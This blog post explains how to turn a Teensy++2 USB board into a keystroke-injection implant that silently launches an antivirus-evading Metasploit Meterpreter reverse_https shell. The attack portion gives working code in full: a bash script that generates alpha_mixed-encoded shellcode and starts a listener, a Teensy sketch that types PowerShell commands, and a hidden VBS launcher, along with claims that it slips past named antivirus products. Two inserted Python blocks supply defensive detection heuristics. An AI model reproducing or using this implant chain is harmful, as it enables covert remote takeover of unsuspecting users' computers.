Teensy++2 Metasploit Part. 2


Avoiding anti-virus software in order to execute our payloads off the Teensy is my next exercise. Lately most of the Metasploit-generated loaders get detected. There are various techniques to bypass this detection; I stumbled across Bernardo Damele's blog post and decided to use his technique on a Teensy++2.

The original article is here: execute-metasploit-payloads-bypassing.html

All the steps here are already covered in the previous article, Teensy2-0-and-metasploit. So once again, with our Teensy and Arduino programming environment set up on our Linux box, we can create a new project, “trojaned-usbdrive” for example.

Our code is a little different from the previous one (again, place this in the Metasploit root folder):

#!/bin/bash
echo "************************************************************"
echo "           Automatic shellcode generator                    "
echo "                                                            "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # store IP
case $OS in
   Linux) IP=`ifconfig tun0  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   FreeBSD|OpenBSD) IP=`ifconfig  tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
   SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
   *) IP="Unknown";;
esac
#echo "$IP"
# Generate the reverse_https payload and encode it as alphanumeric text
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX > alphacode

# Create the ShellCode directory if it does not exist yet
if [ ! -d "ShellCode" ]; then
mkdir ShellCode
fi
mv alphacode ShellCode
# run.bat is "a.exe " followed by the encoded payload on the same line
echo -e  "a.exe \c" > ShellCode/run.bat
cat ShellCode/alphacode >> ShellCode/run.bat
rm ShellCode/alphacode
mv ShellCode/run.bat /home/knoppix/arduino-0022/trojaned_usbdrive/disk

# Start the listener that waits for the connection back
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe'  E

We are using the x86/alpha_mixed encoder to create our Meterpreter shellcode. What happens here is that the reverse_https Meterpreter payload is encoded via msfencode using mixed-case alphanumeric characters, the result is dumped as alphacode into the ShellCode subdirectory, and run.bat is created there as well (a.exe followed by the encoded payload on one line). Then the script moves run.bat into the project directory of your Arduino installation folder (trojaned_usbdrive in this example) and starts the multi/handler listener.
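As an added example (not part of the original post or of the linked article), here is a small Python heuristic a defender could run over batch files found on removable media: it flags any line that invokes a program with a single, long, purely alphanumeric argument, which is exactly the shape of the run.bat the script above produces. The sample batch contents, the length threshold and the function name are constructed for this example; the argument text is made-up filler, not real encoder output.

```python
import re
from typing import List, Tuple

# Constructed sample of the run.bat layout produced by the script above:
# the loader name followed by one long alphanumeric argument. The argument
# here is made-up filler, not real encoder output.
SAMPLE_RUN_BAT = "a.exe " + "PY" + "I" * 10 + "aBcD3fGh1jKlMn0pQrStUvWxYz" * 12

# Ordinary batch lines the heuristic must leave alone (constructed).
SAMPLE_BENIGN_BAT = "\n".join([
    "@echo off",
    "set JAVA_HOME=C:\\Program Files\\Java\\jdk1.6.0",
    "java -Xmx512m -jar app.jar --config=settings.properties",
    "pause",
])

ALNUM_ONLY = re.compile(r"^[A-Za-z0-9]+$")


def suspicious_batch_lines(text: str, min_len: int = 200) -> List[Tuple[int, str, int]]:
    """Return (line number, program, argument length) for every line that
    runs a program with exactly one argument that is purely alphanumeric
    and at least min_len characters long. Real arguments (paths, switches,
    key=value options) almost always contain punctuation, while the output
    of an alphanumeric encoder such as x86/alpha_mixed contains nothing but
    mixed-case letters and digits."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        parts = line.strip().split()
        if len(parts) != 2:
            continue
        program, arg = parts
        if len(arg) >= min_len and ALNUM_ONLY.match(arg):
            hits.append((no, program, len(arg)))
    return hits


if __name__ == "__main__":
    print(suspicious_batch_lines(SAMPLE_RUN_BAT))    # one hit on line 1
    print(suspicious_batch_lines(SAMPLE_BENIGN_BAT))  # []
```

The threshold of 200 characters is a constructed starting point; a short encoded stager is already several hundred characters long, so the check has plenty of margin, and lowering it only risks false positives on things like long base64 license keys.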

Now we need to get the shellcodeexec win32 binary from github.com/inquisb/shellcodeexec. You can get the sources there and compile it for x64 too. In this example I named the file a.exe and moved it into the disk folder in the “trojaned-usbdrive” project folder.

Next we have the Teensy++2 code that loads everything:

#include <phukdlib.h>
void setup() {
  }

void loop () {
  delay(9000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("powershell");
  PressAndRelease(KEY_ENTER,1);
  delay(8000);
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  PressAndRelease(KEY_ENTER,1);
  delay(1000);
  Keyboard.print("$drive = $disk.substring(2,2)");
  PressAndRelease(KEY_ENTER,1);
  delay(1000);
  Keyboard.print("cd $drive");
  PressAndRelease(KEY_ENTER,1);  
  delay(500);
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1 (KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER,1);
  delay(1000);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER,1);
  delay(9000000);
}

Our exec.vbs is almost the same as before, to make sure the whole process is invisible to the user:

Set oShell = CreateObject("Wscript.shell")
sPath=Wscript.ScriptFullName
x=InstrRev(sPath, "\")
sPath=Left(sPath,x)
sCmd = sPath+"run.bat"
oShell.Run sCmd,0,False

So you need three files in the trojaned-usbdrive folder: a.exe, run.bat and exec.vbs. When this loads it's fast and silent, and does not leave much noise on the screen.
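Added example, not from the original post: a Python sketch of how a defender could pick the keystroke sequence above out of process-creation logs. The pipe-delimited event format, the sample events, the rule names and the correlation window are all constructed for this example; the indicators themselves (a WMIC logicaldisk query spawned from PowerShell, followed by a script host running a .vbs or .bat from a non-system drive letter, and a binary executing from that drive) come straight from the Teensy and exec.vbs code above.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed process-creation events, one per line, as
# time|parent image name|image path|command line. They are made up to
# resemble the chain the keystroke payload above produces; not real logs.
SAMPLE_EVENTS = """\
2011-06-01 09:12:00|explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -File C:\\scripts\\backup.ps1
2011-06-01 10:00:01|explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell
2011-06-01 10:00:09|powershell.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic logicaldisk list brief
2011-06-01 10:00:11|powershell.exe|C:\\Windows\\System32\\wscript.exe|"C:\\Windows\\System32\\wscript.exe" "E:\\exec.vbs"
2011-06-01 10:00:12|wscript.exe|C:\\Windows\\System32\\cmd.exe|cmd /c E:\\run.bat
2011-06-01 10:00:12|cmd.exe|E:\\a.exe|a.exe PYIIIIIIIIIIabcdefgh
"""

Event = Tuple[datetime, str, str, str]  # (time, parent name, image path, command line)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
# A .vbs/.bat/.cmd/.js referenced on a drive letter other than C: (the removable drive).
NON_SYSTEM_SCRIPT = re.compile(r'\b[D-Z]:\\[^\s"]*\.(?:vbs|bat|cmd|js)\b', re.I)
NON_SYSTEM_IMAGE = re.compile(r"^[D-Z]:\\", re.I)


def parse_events(text: str) -> List[Event]:
    """Parse the constructed pipe-delimited format into Event tuples."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       parent.lower(), image.lower(), cmdline))
    return events


def match_rules(event: Event) -> List[str]:
    """Names of the indicator rules a single event satisfies."""
    _, parent, image, cmdline = event
    image_name = image.rsplit("\\", 1)[-1]
    fired = []
    if parent == "powershell.exe" and "wmic logicaldisk" in cmdline.lower():
        fired.append("wmic_logicaldisk_from_powershell")
    if image_name in SCRIPT_HOSTS and NON_SYSTEM_SCRIPT.search(cmdline):
        fired.append("script_or_batch_from_non_system_drive")
    if NON_SYSTEM_IMAGE.match(image):
        fired.append("binary_run_from_non_system_drive")
    return fired


def detect(text: str, window: timedelta = timedelta(seconds=60)) -> Dict[str, object]:
    """Run the rules over every event and correlate them: a drive enumeration
    followed within `window` by a script host launching a script from a
    non-system drive is the sequence the Teensy payload types, and is
    reported as a chained alert rather than as isolated hits."""
    hits = [(ev[0], rule, ev[3]) for ev in parse_events(text) for rule in match_rules(ev)]
    enum_times = [t for t, rule, _ in hits if rule == "wmic_logicaldisk_from_powershell"]
    chained = any(
        rule == "script_or_batch_from_non_system_drive"
        and any(timedelta(0) <= t - e <= window for e in enum_times)
        for t, rule, _ in hits
    )
    return {"hits": hits, "chained": chained}


if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for t, rule, cmdline in result["hits"]:
        print(f"{t:%H:%M:%S}  {rule:<40} {cmdline}")
    print("chained alert:", result["chained"])
```

Each rule on its own is noisy (administrators do run WMIC from PowerShell, and people do run batch files from USB sticks), which is why the chained alert, the enumeration followed seconds later by a script launch from the drive it found, is the one worth paging on; the single-rule hits are better kept as context for triage.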

This should get past most antivirus software undetected (tested against Trend Micro, Kaspersky, …).

Part 3… The Final Product 


3 Responses to Teensy++2 Metasploit Part. 2

  1. codeforge says:

    Hi,
    I get a different character when I connect the Teensy to the USB: I get an ì instead of ‘=’ and cannot execute the code… How can I get a = (equal) instead of ì?

    thanks

    • astr0baby says:

      Hi
      Where exactly do you have the problem with equals? Is it in the Keyboard.print(“$disk = wmic … command here? If this is the case you can split the command and use KEY_EQUAL instead. Look here for info:
      http://www.pjrc.com/teensy/usb_keyboard.html
      So you would do this :

      Keyboard.print("$disk ");
      Keyboard.set_key1(KEY_EQUAL);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      Keyboard.print(" wmic logicaldisk list brief | sel…");
      etc….

  2. codeforge says:

    Hi,
    thanks for the reply. I tried to do what you suggested but I get the same result.
    I resolved the problem by changing the keyboard layout in Windows to English; with my default Italian keyboard I get bad characters, with English the Teensy works :)

    Thanks again for the reply.
